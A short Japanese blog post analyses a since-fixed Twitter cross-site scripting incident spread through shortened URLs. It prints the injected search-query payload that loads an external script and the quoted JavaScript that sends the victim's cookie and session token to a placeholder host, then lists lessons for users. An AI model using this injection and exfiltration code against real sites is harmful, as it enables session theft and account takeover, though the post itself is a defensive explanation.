IT media Twitterで悪質なスクリプトが流通、cookie盗難の恐れ に関する考察なんぞ.

記事中のツイート内容で検索をかけたら簡単に元ツイートまで辿りつけた.

短縮URLの実態としては

//dev.twitter.com/search?query=%253C/script%253E%253Cscript%20src=%27(jsファイル)%27%253E%253C/script%253E 

というように、http://dev.twitter.com/searchへのクエリにscriptの外部読み込みコードを混ぜている様子.(%25=% , %27=' , %3C=< , %3E=>)

具体的には以下のようなコードがtwitterの検索ページに埋め込まれる形になる.

次に、実際に呼び出されていたjsファイルのコードは

window.onload=function(){
location.href='//(指定URL)?cookie='.concat(escape(document.cookie),'&token=',document.body.innerHTML.match(/value\', \'([^\']+)/i)[1]);
}

このように、指定URLにクッキーとトークン(ログイン中はずっと一緒)を含めて送りつける様子．サーバー側でログを見ればクッキーとトークンが得られる事になる.

現在この脆弱性は修正された模様.

教訓
・短縮URLを無用心に踏まない
・信頼できるURL先でも注意
・短縮URLサービスはコードが含まれてそうなら警告を出して欲しい...